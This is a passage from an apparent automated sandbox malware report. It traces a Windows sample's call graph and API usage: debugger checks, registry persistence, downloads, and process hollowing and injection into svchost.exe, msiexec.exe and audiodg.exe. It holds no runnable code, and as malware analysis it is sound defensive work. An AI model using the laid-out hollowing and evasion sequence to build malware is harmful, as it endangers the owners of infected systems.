LoadLibraryA GetProcAddress 1074->1287 1076 7ff7f73e1c46 1288 7ff7f73e14ec LoadLibraryA GetProcAddress 1076->1288 1078 7ff7f73e1c60 1289 7ff7f73e14ec LoadLibraryA GetProcAddress 1078->1289 1080 7ff7f73e1c7a 1290 7ff7f73e14ec LoadLibraryA GetProcAddress 1080->1290 1082 7ff7f73e1c94 1291 7ff7f73e14ec LoadLibraryA GetProcAddress 1082->1291 1084 7ff7f73e1cae 1292 7ff7f73e14ec LoadLibraryA GetProcAddress 1084->1292 1086 7ff7f73e1cc8 1293 7ff7f73e14ec LoadLibraryA GetProcAddress 1086->1293 1088 7ff7f73e1ce2 1294 7ff7f73e14ec LoadLibraryA GetProcAddress 1088->1294 1090 7ff7f73e1cfc 1295 7ff7f73e14ec LoadLibraryA GetProcAddress 1090->1295 1092 7ff7f73e1d16 1296 7ff7f73e14ec LoadLibraryA GetProcAddress 1092->1296 1094 7ff7f73e1d30 1297 7ff7f73e14ec LoadLibraryA GetProcAddress 1094->1297 1096 7ff7f73e1d4a 1298 7ff7f73e14ec LoadLibraryA GetProcAddress 1096->1298 1098 7ff7f73e1d64 1299 7ff7f73e14ec LoadLibraryA GetProcAddress 1098->1299 1100 7ff7f73e1d7e 1300 7ff7f73e14ec LoadLibraryA GetProcAddress 1100->1300 1102 7ff7f73e1d98 1301 7ff7f73e14ec LoadLibraryA GetProcAddress 1102->1301 1104 7ff7f73e1db2 1302 7ff7f73e14ec LoadLibraryA GetProcAddress 1104->1302 1106 7ff7f73e1dcc 1303 7ff7f73e14ec LoadLibraryA GetProcAddress 1106->1303 1108 7ff7f73e1de6 1304 7ff7f73e14ec LoadLibraryA GetProcAddress 1108->1304 1110 7ff7f73e1e00 1305 7ff7f73e14ec LoadLibraryA GetProcAddress 1110->1305 1112 7ff7f73e1e1a 1306 7ff7f73e14ec LoadLibraryA GetProcAddress 1112->1306 1114 7ff7f73e1e34 1307 7ff7f73e14ec LoadLibraryA GetProcAddress 1114->1307 1116 7ff7f73e1e4e 1308 7ff7f73e14ec LoadLibraryA GetProcAddress 1116->1308 1118 7ff7f73e1e68 1309 7ff7f73e14ec LoadLibraryA GetProcAddress 1118->1309 1120 7ff7f73e1e82 1310 7ff7f73e14ec LoadLibraryA GetProcAddress 1120->1310 1122 7ff7f73e1e9c 1311 7ff7f73e14ec LoadLibraryA GetProcAddress 1122->1311 1124 7ff7f73e1eb6 1312 7ff7f73e14ec LoadLibraryA GetProcAddress 1124->1312 1126 7ff7f73e1ed0 1313 7ff7f73e14ec LoadLibraryA GetProcAddress 1126->1313 1128 7ff7f73e1eea 1314 7ff7f73e14ec LoadLibraryA GetProcAddress 1128->1314 1130 7ff7f73e1f04 1315 7ff7f73e14ec LoadLibraryA GetProcAddress 1130->1315 1132 7ff7f73e1f1e 1316 7ff7f73e14ec LoadLibraryA GetProcAddress 1132->1316 1134 7ff7f73e1f38 1317 7ff7f73e14ec LoadLibraryA GetProcAddress 1134->1317 1136 7ff7f73e1f52 1318 7ff7f73e14ec LoadLibraryA GetProcAddress 1136->1318 1138 7ff7f73e1f6c 1319 7ff7f73e14ec LoadLibraryA GetProcAddress 1138->1319 1140 7ff7f73e1f86 1320 7ff7f73e14ec LoadLibraryA GetProcAddress 1140->1320 1142 7ff7f73e1fa0 1321 7ff7f73e14ec LoadLibraryA GetProcAddress 1142->1321 1144 7ff7f73e1fba 1322 7ff7f73e149c LoadLibraryA GetProcAddress 1144->1322 1146 7ff7f73e1fd4 1323 7ff7f73e14ec LoadLibraryA GetProcAddress 1146->1323 1148 7ff7f73e1fee 1324 7ff7f73e14ec LoadLibraryA GetProcAddress 1148->1324 1150 7ff7f73e2008 1325 7ff7f73e14ec LoadLibraryA GetProcAddress 1150->1325 1152 7ff7f73e2022 1326 7ff7f73e14ec LoadLibraryA GetProcAddress 1152->1326 1154 7ff7f73e203c 1327 7ff7f73e14ec LoadLibraryA GetProcAddress 1154->1327 1156 7ff7f73e2056 1328 7ff7f73e14ec LoadLibraryA GetProcAddress 1156->1328 1158 7ff7f73e2070 1329 7ff7f73e14ec LoadLibraryA GetProcAddress 1158->1329 1160 7ff7f73e208a 1330 7ff7f73e149c LoadLibraryA GetProcAddress 1160->1330 1162 7ff7f73e20a4 1331 7ff7f73e149c LoadLibraryA GetProcAddress 1162->1331 1164 7ff7f73e20be 1332 7ff7f73e14ec LoadLibraryA GetProcAddress 1164->1332 1166 7ff7f73e20d8 1333 7ff7f73e14ec LoadLibraryA GetProcAddress 1166->1333 1168 7ff7f73e20f2 1334 7ff7f73e14ec LoadLibraryA GetProcAddress 1168->1334 1170 7ff7f73e210c 1335 7ff7f73e14ec LoadLibraryA GetProcAddress 1170->1335 1172 7ff7f73e2126 1336 7ff7f73e14ec LoadLibraryA GetProcAddress 1172->1336 1174 7ff7f73e2140 1337 7ff7f73e14ec LoadLibraryA GetProcAddress 1174->1337 1176 7ff7f73e215a 1177 7ff7f73e31b4 IsDebuggerPresent 1176->1177 1178 7ff7f73e31c6 GetCurrentProcess CheckRemoteDebuggerPresent 1177->1178 1179 7ff7f73e31c2 1177->1179 1178->1179 1179->890 1179->891 1181 7ff7f73e40d2 GetTokenInformation 1180->1181 1182 7ff7f73e3439 1180->1182 1338 7ff7f73e3b1c VirtualAlloc 1181->1338 1191 7ff7f73e3cac GetModuleFileNameW 1182->1191 1184 7ff7f73e4103 GetTokenInformation 1185 7ff7f73e4130 CloseHandle 1184->1185 1186 7ff7f73e414a AdjustTokenPrivileges CloseHandle 1184->1186 1187 7ff7f73e3aec VirtualFree 1185->1187 1339 7ff7f73e3aec 1186->1339 1188 7ff7f73e4145 1187->1188 1188->1182 1192 7ff7f73e3cd7 PathFindFileNameW wcslen 1191->1192 1193 7ff7f73e3d9a wcsncpy 1191->1193 1194 7ff7f73e3d11 1192->1194 1193->1194 1194->895 1196 7ff7f73e3525 1195->1196 1197 7ff7f73e4218 GetLastError 1195->1197 1196->921 1196->922 1197->1196 1198 7ff7f73e4225 CloseHandle 1197->1198 1198->1196 1342 7ff7f73e388c 1199->1342 1201 7ff7f73e3224 1345 7ff7f73e42fc CreateFileW 1201->1345 1205 7ff7f73e370c 3 API calls 1204->1205 1206 7ff7f73e3a67 1205->1206 1207 7ff7f73e388c 11 API calls 1206->1207 1208 7ff7f73e3a71 GetModuleFileNameW DeleteFileW CopyFileW 1207->1208 1209 7ff7f73e3ab3 SetFileAttributesW 1208->1209 1211 7ff7f73e355f 1208->1211 1362 7ff7f73e397c RegOpenKeyExW 1209->1362 1212 7ff7f73e33a4 GetVersionExW 1211->1212 1213 7ff7f73e33d5 1212->1213 1213->931 1213->932 1215 7ff7f73e388c 11 API calls 1214->1215 1216 7ff7f73e32b5 1215->1216 1365 7ff7f73e452c CreateFileW 1216->1365 1218 7ff7f73e32cd 1219 7ff7f73e330f CreateThread 1218->1219 1377 7ff7f73e408c 1218->1377 1219->920 1223->948 1224->950 1225->952 1226->954 1227->956 1228->958 1229->960 1230->962 1231->964 1232->966 1233->968 1234->970 1235->972 1236->974 1237->976 1238->978 1239->980 1240->982 1241->984 1242->986 1243->988 1244->990 1245->992 1246->994 1247->996 1248->998 1249->1000 1250->1002 1251->1004 1252->1006 1253->1008 1254->1010 1255->1012 1256->1014 1257->1016 1258->1018 1259->1020 1260->1022 1261->1024 1262->1026 1263->1028 1264->1030 1265->1032 1266->1034 1267->1036 1268->1038 1269->1040 1270->1042 1271->1044 1272->1046 1273->1048 1274->1050 1275->1052 1276->1054 1277->1056 1278->1058 1279->1060 1280->1062 1281->1064 1282->1066 1283->1068 1284->1070 1285->1072 1286->1074 1287->1076 1288->1078 1289->1080 1290->1082 1291->1084 1292->1086 1293->1088 1294->1090 1295->1092 1296->1094 1297->1096 1298->1098 1299->1100 1300->1102 1301->1104 1302->1106 1303->1108 1304->1110 1305->1112 1306->1114 1307->1116 1308->1118 1309->1120 1310->1122 1311->1124 1312->1126 1313->1128 1314->1130 1315->1132 1316->1134 1317->1136 1318->1138 1319->1140 1320->1142 1321->1144 1322->1146 1323->1148 1324->1150 1325->1152 1326->1154 1327->1156 1328->1158 1329->1160 1330->1162 1331->1164 1332->1166 1333->1168 1334->1170 1335->1172 1336->1174 1337->1176 1338->1184 1340 7ff7f73e3b10 1339->1340 1341 7ff7f73e3afd VirtualFree 1339->1341 1340->1182 1341->1340 1351 7ff7f73e370c GetWindowsDirectoryW 1342->1351 1344 7ff7f73e38bb 8 API calls 1344->1201 1346 7ff7f73e4373 GetLastError 1345->1346 1347 7ff7f73e4352 1345->1347 1349 7ff7f73e3237 CreateThread Sleep CreateThread 1346->1349 1356 7ff7f73e424c GetFileSize 1347->1356 1349->930 1352 7ff7f73e3756 1351->1352 1353 7ff7f73e3760 GetVolumeInformationW 1351->1353 1352->1353 1354 7ff7f73e37dc 1353->1354 1355 7ff7f73e3846 wsprintfW 1354->1355 1355->1344 1361 7ff7f73e3b1c VirtualAlloc 1356->1361 1358 7ff7f73e4278 1359 7ff7f73e428c SetFilePointer ReadFile 1358->1359 1360 7ff7f73e42c2 CloseHandle 1358->1360 1359->1360 1360->1349 1361->1358 1363 7ff7f73e39c1 RegSetValueExW RegCloseKey 1362->1363 1364 7ff7f73e39bd 1362->1364 1363->1364 1364->1211 1366 7ff7f73e458d GetFileSize GetProcessHeap RtlAllocateHeap 1365->1366 1367 7ff7f73e4586 1365->1367 1368 7ff7f73e45d6 CloseHandle 1366->1368 1369 7ff7f73e45e8 ReadFile 1366->1369 1367->1218 1368->1367 1370 7ff7f73e460f GetProcessHeap HeapFree CloseHandle 1369->1370 1371 7ff7f73e4637 1369->1371 1370->1367 1372 7ff7f73e4650 GetProcessHeap HeapFree CloseHandle 1371->1372 1374 7ff7f73e4678 1371->1374 1372->1367 1373 7ff7f73e47e3 GetProcessHeap HeapFree CloseHandle 1373->1367 1374->1373 1375 7ff7f73e4733 GetProcessHeap RtlAllocateHeap 1374->1375 1376 7ff7f73e477c 1375->1376 1376->1373 1396 7ff7f73e3fcc CreateToolhelp32Snapshot 1377->1396 1380 7ff7f73e10d8 OpenProcess 1381 7ff7f73e1115 1380->1381 1382 7ff7f73e111f 1380->1382 1381->1219 1403 7ff7f73e13c4 GetModuleHandleA GetProcAddress 1382->1403 1384 7ff7f73e112c 1384->1381 1385 7ff7f73e11fe VirtualAllocEx 1384->1385 1385->1381 1386 7ff7f73e124f WriteProcessMemory 1385->1386 1386->1381 1387 7ff7f73e1286 WriteProcessMemory 1386->1387 1387->1381 1388 7ff7f73e12d1 1387->1388 1405 7ff7f73e1444 GetSystemInfo 1388->1405 1391 7ff7f73e12fe GetModuleHandleA GetProcAddress 1391->1381 1393 7ff7f73e1338 1391->1393 1392 7ff7f73e1444 GetSystemInfo 1394 7ff7f73e12f4 1392->1394 1393->1381 1395 7ff7f73e1399 CloseHandle 1393->1395 1394->1391 1394->1395 1395->1381 1397 7ff7f73e32fa 1396->1397 1398 7ff7f73e4007 Process32FirstW 1396->1398 1397->1380 1399 7ff7f73e4026 wcscmp 1398->1399 1400 7ff7f73e4061 CloseHandle 1398->1400 1401 7ff7f73e403d 1399->1401 1402 7ff7f73e404a Process32NextW 1399->1402 1400->1397 1401->1400 1402->1399 1402->1400 1404 7ff7f73e13ff 1403->1404 1404->1384 1406 7ff7f73e12ea 1405->1406 1406->1391 1406->1392 1407 7ff7f73e3344 1408 7ff7f73e24d4 37 API calls 1407->1408 1409 7ff7f73e3354 1408->1409 1410 7ff7f73e3074 1415 7ff7f73e307d 1410->1415 1411 7ff7f73e3169 1414 7ff7f73e3bec RegDeleteKeyW 1414->1415 1415->1411 1415->1414 1416 7ff7f73e3dec 9 API calls 1415->1416 1417 7ff7f73e397c 3 API calls 1415->1417 1419 7ff7f73e440c CreateFileW 1415->1419 1424 7ff7f73e3b4c RegOpenKeyExW 1415->1424 1416->1415 1418 7ff7f73e3159 Sleep 1417->1418 1418->1415 1420 7ff7f73e44a2 1419->1420 1421 7ff7f73e4467 1419->1421 1420->1415 1427 7ff7f73e438c SetFilePointer WriteFile SetEndOfFile 1421->1427 1423 7ff7f73e4483 SetFileAttributesW CloseHandle 1423->1420 1425 7ff7f73e3ba0 RegSetValueExW RegCloseKey 1424->1425 1426 7ff7f73e3bda 1424->1426 1425->1426 1426->1415 1427->1423 1445 7ff7f73e3184 1446 7ff7f73e318d 1445->1446 1447 7ff7f73e31a6 1446->1447 1450 7ff7f73e3004 1446->1450 1455 7ff7f73e2e04 CreateMutexA 1450->1455 1453 7ff7f73e3064 Sleep 1453->1446 1454 7ff7f73e301f Sleep CreateThread WaitForSingleObject 1454->1453 1456 7ff7f73e2e30 ReleaseMutex CloseHandle 1455->1456 1457 7ff7f73e2e4d GetLastError 1455->1457 1458 7ff7f73e2e8f 1456->1458 1459 7ff7f73e2e77 ReleaseMutex CloseHandle 1457->1459 1460 7ff7f73e2e5a ReleaseMutex CloseHandle 1457->1460 1458->1453 1458->1454 1459->1458 1460->1458 1463 7ff7f73e2ea4 CreateMutexA 1464 7ff7f73e2ee6 GetLastError 1463->1464 1465 7ff7f73e2ec9 ReleaseMutex CloseHandle 1463->1465 1467 7ff7f73e2ef3 ReleaseMutex CloseHandle 1464->1467 1468 7ff7f73e2f10 ReleaseMutex CloseHandle 1464->1468 1466 7ff7f73e2f28 1465->1466 1467->1466 1468->1466 1469 7ff7f73e2f34 1470 7ff7f73e388c 11 API calls 1469->1470 1471 7ff7f73e2f73 1470->1471 1472 7ff7f73e452c 17 API calls 1471->1472 1473 7ff7f73e2f97 1472->1473 1474 7ff7f73e408c 5 API calls 1473->1474 1475 7ff7f73e2fba 1474->1475 1476 7ff7f73e10d8 10 API calls 1475->1476 1477 7ff7f73e2fcf GetProcessHeap HeapFree 1476->1477 1428 7ff7f73e2168 1429 7ff7f73e2192 InternetOpenW 1428->1429 1430 7ff7f73e21bf Sleep 1429->1430 1431 7ff7f73e21cc InternetOpenUrlW 1429->1431 1430->1429 1432 7ff7f73e2203 InternetOpenUrlW 1431->1432 1433 7ff7f73e2255 HttpQueryInfoA 1431->1433 1432->1433 1434 7ff7f73e223a InternetCloseHandle Sleep 1432->1434 1435 7ff7f73e2284 InternetCloseHandle InternetCloseHandle Sleep 1433->1435 1436 7ff7f73e22aa 1433->1436 1434->1429 1435->1429 1437 7ff7f73e22b4 InternetCloseHandle InternetOpenUrlW 1436->1437 1438 7ff7f73e2311 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1436->1438 1437->1438 1439 7ff7f73e22f6 InternetCloseHandle Sleep 1437->1439 1440 7ff7f73e2376 InternetCloseHandle InternetCloseHandle 1438->1440 1444 7ff7f73e2390 1438->1444 1439->1429 1441 7ff7f73e240f 1440->1441 1442 7ff7f73e2398 InternetReadFile 1443 7ff7f73e23e6 InternetCloseHandle InternetCloseHandle 1442->1443 1442->1444 1443->1441 1444->1442 1444->1443 1461 7ff7f73e1088 GetModuleHandleA GetProcAddress 1462 7ff7f73e10bb 1461->1462

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_00007FF7F73E3364 109 Function_00007FF7F73E24D4 0->109 1 Function_00007FF7F73EB061 2 Function_00007FF7F73EFE5A 3 Function_00007FF7F73ED65A 4 Function_00007FF7F73EB05A 5 Function_00007FF7F73E3074 17 Function_00007FF7F73E397C 5->17 43 Function_00007FF7F73E3B4C 5->43 64 Function_00007FF7F73E3BEC 5->64 65 Function_00007FF7F73E3DEC 5->65 81 Function_00007FF7F73E440C 5->81 6 Function_00007FF7F73EB776 7 Function_00007FF7F73EEC71 8 Function_00007FF7F73EEA72 9 Function_00007FF7F73EB772 10 Function_00007FF7F73EB26F 11 Function_00007FF7F73E2168 12 Function_00007FF7F73EE668 13 Function_00007FF7F73E3384 13->109 14 Function_00007FF7F73E3184 67 Function_00007FF7F73E3004 14->67 15 Function_00007FF7F73E147F 16 Function_00007FF7F73EE07F 18 Function_00007FF7F73EE079 19 Function_00007FF7F73EB778 20 Function_00007FF7F73E2494 21 Function_00007FF7F73EDA94 22 Function_00007FF7F73E408C 110 Function_00007FF7F73E3FCC 22->110 23 Function_00007FF7F73E438C 24 Function_00007FF7F73E388C 80 Function_00007FF7F73E370C 24->80 25 Function_00007FF7F73EE289 26 Function_00007FF7F73E1088 27 Function_00007FF7F73EEC20 28 Function_00007FF7F73E3B1C 29 Function_00007FF7F73E2F34 29->22 29->24 30 Function_00007FF7F73E452C 29->30 31 Function_00007FF7F73E3C2C 29->31 56 Function_00007FF7F73E10D8 29->56 107 Function_00007FF7F73E44BC 30->107 32 Function_00007FF7F73E3344 32->109 33 Function_00007FF7F73E1444 34 Function_00007FF7F73E153C 62 Function_00007FF7F73E14EC 34->62 92 Function_00007FF7F73E149C 34->92 35 Function_00007FF7F73E3A3C 35->17 35->24 35->80 36 Function_00007FF7F73EDC37 37 Function_00007FF7F73E2454 38 Function_00007FF7F73E3555 39 Function_00007FF7F73EB052 40 Function_00007FF7F73EB152 41 Function_00007FF7F73EC14F 42 Function_00007FF7F73E424C 42->28 44 Function_00007FF7F73EB04E 45 Function_00007FF7F73EF74B 46 Function_00007FF7F73EF749 47 Function_00007FF7F73EF747 48 Function_00007FF7F73EB248 49 Function_00007FF7F73ED2E5 50 Function_00007FF7F73EF7E6 51 Function_00007FF7F73ED2E3 52 Function_00007FF7F73EC2E4 53 Function_00007FF7F73ECCE1 54 Function_00007FF7F73E3EDC 55 Function_00007FF7F73E36DC 56->33 71 Function_00007FF7F73E1000 56->71 102 Function_00007FF7F73E13C4 56->102 57 Function_00007FF7F73F01DA 58 Function_00007FF7F73EB0D8 59 Function_00007FF7F73EE9F6 60 Function_00007FF7F73EBBF2 61 Function_00007FF7F73E3AEC 63 Function_00007FF7F73E41EC 66 Function_00007FF7F73ED2E7 68 Function_00007FF7F73E2E04 67->68 69 Function_00007FF7F73EEA05 70 Function_00007FF7F73EDE04 72 Function_00007FF7F73E42FC 72->42 73 Function_00007FF7F73EBBFB 74 Function_00007FF7F73EBBF9 75 Function_00007FF7F73EBBF7 76 Function_00007FF7F73EC4F8 77 Function_00007FF7F73E3414 77->34 77->35 77->54 77->63 79 Function_00007FF7F73E3214 77->79 84 Function_00007FF7F73E33A4 77->84 85 Function_00007FF7F73E32A4 77->85 94 Function_00007FF7F73E31B4 77->94 98 Function_00007FF7F73E40AC 77->98 99 Function_00007FF7F73E3CAC 77->99 78 Function_00007FF7F73E2414 79->24 79->72 80->55 81->23 82 Function_00007FF7F73ED70B 83 Function_00007FF7F73EEC09 85->22 85->24 85->30 85->31 85->56 86 Function_00007FF7F73E2EA4 87 Function_00007FF7F73EE0A5 88 Function_00007FF7F73E36A6 89 Function_00007FF7F73EF6A3 90 Function_00007FF7F73EE0A1 91 Function_00007FF7F73F01A2 93 Function_00007FF7F73ECE9D 95 Function_00007FF7F73E36B4 96 Function_00007FF7F73EE6B4 97 Function_00007FF7F73F00B0 98->28 98->61 100 Function_00007FF7F73EE4AB 101 Function_00007FF7F73EFEA9 103 Function_00007FF7F73E36C4 104 Function_00007FF7F73EE6C5 105 Function_00007FF7F73E35C1 106 Function_00007FF7F73EB2C0 108 Function_00007FF7F73EEDB8 109->20 109->37 109->78 111 Function_00007FF7F73EE6CD

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF7F73E24D4 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 231 7ff7f73e24d4-7ff7f73e254e GetModuleFileNameW 232 7ff7f73e2555-7ff7f73e2591 231->232 233 7ff7f73e2550 231->233 235 7ff7f73e2593-7ff7f73e259b 232->235 236 7ff7f73e25a9-7ff7f73e25c5 call 7ff7f73e2414 232->236 234 7ff7f73e2df9-7ff7f73e2e01 233->234 237 7ff7f73e259d-7ff7f73e25a5 235->237 238 7ff7f73e25c7-7ff7f73e25e3 call 7ff7f73e2454 235->238 245 7ff7f73e2608-7ff7f73e2612 236->245 240 7ff7f73e25e5-7ff7f73e2601 call 7ff7f73e2494 237->240 241 7ff7f73e25a7-7ff7f73e2603 237->241 238->245 240->245 241->234 248 7ff7f73e2614 245->248 249 7ff7f73e2619-7ff7f73e266d CreateProcessW 245->249 248->234 251 7ff7f73e2674-7ff7f73e26b4 CreateFileW 249->251 252 7ff7f73e266f 249->252 253 7ff7f73e26b6 251->253 254 7ff7f73e26bb-7ff7f73e26d7 GetFileSize 251->254 252->234 253->234 255 7ff7f73e26e3-7ff7f73e26ee CloseHandle 254->255 256 7ff7f73e26d9-7ff7f73e26e1 254->256 255->234 256->255 257 7ff7f73e26f3-7ff7f73e271b VirtualAlloc 256->257 258 7ff7f73e272d-7ff7f73e2758 ReadFile 257->258 259 7ff7f73e271d-7ff7f73e2728 CloseHandle 257->259 260 7ff7f73e277d-7ff7f73e27cb CloseHandle GetThreadContext 258->260 261 7ff7f73e275a-7ff7f73e2778 VirtualFree CloseHandle 258->261 259->234 262 7ff7f73e27e5-7ff7f73e286a ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 260->262 263 7ff7f73e27cd-7ff7f73e27e0 VirtualFree 260->263 261->234 264 7ff7f73e2884-7ff7f73e28ed VirtualAllocEx 262->264 265 7ff7f73e286c-7ff7f73e287f VirtualFree 262->265 263->234 266 7ff7f73e28ef-7ff7f73e2902 VirtualFree 264->266 267 7ff7f73e2907-7ff7f73e293b WriteProcessMemory 264->267 265->234 266->234 268 7ff7f73e2955-7ff7f73e2960 267->268 269 7ff7f73e293d-7ff7f73e2950 VirtualFree 267->269 270 7ff7f73e2972-7ff7f73e2985 268->270 269->234 271 7ff7f73e2a33-7ff7f73e2a7a 270->271 272 7ff7f73e298b-7ff7f73e2a14 WriteProcessMemory 270->272 275 7ff7f73e2a8c-7ff7f73e2a9f 271->275 273 7ff7f73e2a16-7ff7f73e2a29 VirtualFree 272->273 274 7ff7f73e2a2e 272->274 273->234 274->270 277 7ff7f73e2d24-7ff7f73e2da8 WriteProcessMemory SetThreadContext 275->277 278 7ff7f73e2aa5-7ff7f73e2af4 RtlCompareMemory 275->278 279 7ff7f73e2dbf-7ff7f73e2dcf ResumeThread 277->279 280 7ff7f73e2daa-7ff7f73e2dbd VirtualFree 277->280 281 7ff7f73e2af6 278->281 282 7ff7f73e2af8-7ff7f73e2b21 278->282 284 7ff7f73e2de6-7ff7f73e2df3 VirtualFree 279->284 285 7ff7f73e2dd1-7ff7f73e2de4 VirtualFree 279->285 280->234 281->275 286 7ff7f73e2b2c-7ff7f73e2b3a 282->286 284->234 285->234 287 7ff7f73e2b40-7ff7f73e2bcb 286->287 288 7ff7f73e2d1f 286->288 289 7ff7f73e2bdd-7ff7f73e2beb 287->289 288->277 290 7ff7f73e2bf1-7ff7f73e2c24 289->290 291 7ff7f73e2d1a 289->291 292 7ff7f73e2c26 290->292 293 7ff7f73e2c28-7ff7f73e2cfb ReadProcessMemory WriteProcessMemory 290->293 291->286 292->289 295 7ff7f73e2d15 293->295 296 7ff7f73e2cfd-7ff7f73e2d10 VirtualFree 293->296 295->291 296->234
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                  • Opcode ID: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction ID: b3722fe31aa29a62b99d628630f2b0a5a309b8ba5695aee024f538efa8af881a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37321936A0CBC596E770DB16E8543AAB3A1FBC8B40F404139DA9D83B98DF3CD4598B51
                                                                                                                                                                                                                                  Function 00007FF7F73E3414 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 297 7ff7f73e3414-7ff7f73e342a call 7ff7f73e153c call 7ff7f73e31b4 302 7ff7f73e3434-7ff7f73e3462 call 7ff7f73e40ac call 7ff7f73e3cac call 7ff7f73e3edc 297->302 303 7ff7f73e342c-7ff7f73e342e ExitProcess 297->303 310 7ff7f73e3464-7ff7f73e3475 call 7ff7f73e41ec 302->310 311 7ff7f73e34b3-7ff7f73e34c6 call 7ff7f73e3edc 302->311 318 7ff7f73e3477-7ff7f73e3488 call 7ff7f73e41ec 310->318 319 7ff7f73e348a-7ff7f73e348c ExitProcess 310->319 316 7ff7f73e3504-7ff7f73e3517 call 7ff7f73e3edc 311->316 317 7ff7f73e34c8-7ff7f73e34d9 call 7ff7f73e41ec 311->317 329 7ff7f73e355a-7ff7f73e3570 call 7ff7f73e3a3c call 7ff7f73e33a4 316->329 330 7ff7f73e3519-7ff7f73e352a call 7ff7f73e41ec 316->330 326 7ff7f73e34e3 call 7ff7f73e3214 317->326 327 7ff7f73e34db-7ff7f73e34dd ExitProcess 317->327 318->319 328 7ff7f73e3492 call 7ff7f73e32a4 318->328 336 7ff7f73e34e8-7ff7f73e34ed 326->336 338 7ff7f73e3497-7ff7f73e349c 328->338 349 7ff7f73e35c6-7ff7f73e369e CreateThread * 3 WaitForMultipleObjects ExitProcess 329->349 350 7ff7f73e3572-7ff7f73e3583 call 7ff7f73e41ec 329->350 339 7ff7f73e3534 call 7ff7f73e3214 330->339 340 7ff7f73e352c-7ff7f73e352e ExitProcess 330->340 341 7ff7f73e34ef-7ff7f73e34fa Sleep 336->341 342 7ff7f73e34fc-7ff7f73e34fe ExitProcess 336->342 344 7ff7f73e34ab-7ff7f73e34ad ExitProcess 338->344 345 7ff7f73e349e-7ff7f73e34a9 Sleep 338->345 348 7ff7f73e3539-7ff7f73e353e 339->348 341->336 345->338 351 7ff7f73e3540-7ff7f73e354b Sleep 348->351 352 7ff7f73e354d-7ff7f73e354f ExitProcess 348->352 355 7ff7f73e3585-7ff7f73e3596 call 7ff7f73e41ec 350->355 356 7ff7f73e3598-7ff7f73e359a ExitProcess 350->356 351->348 355->356 359 7ff7f73e35a0 call 7ff7f73e32a4 355->359 361 7ff7f73e35a5-7ff7f73e35aa 359->361 362 7ff7f73e35ac-7ff7f73e35b7 Sleep 361->362 363 7ff7f73e35b9-7ff7f73e35bb ExitProcess 361->363 362->361
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                                  • API String ID: 613740775-1953711635
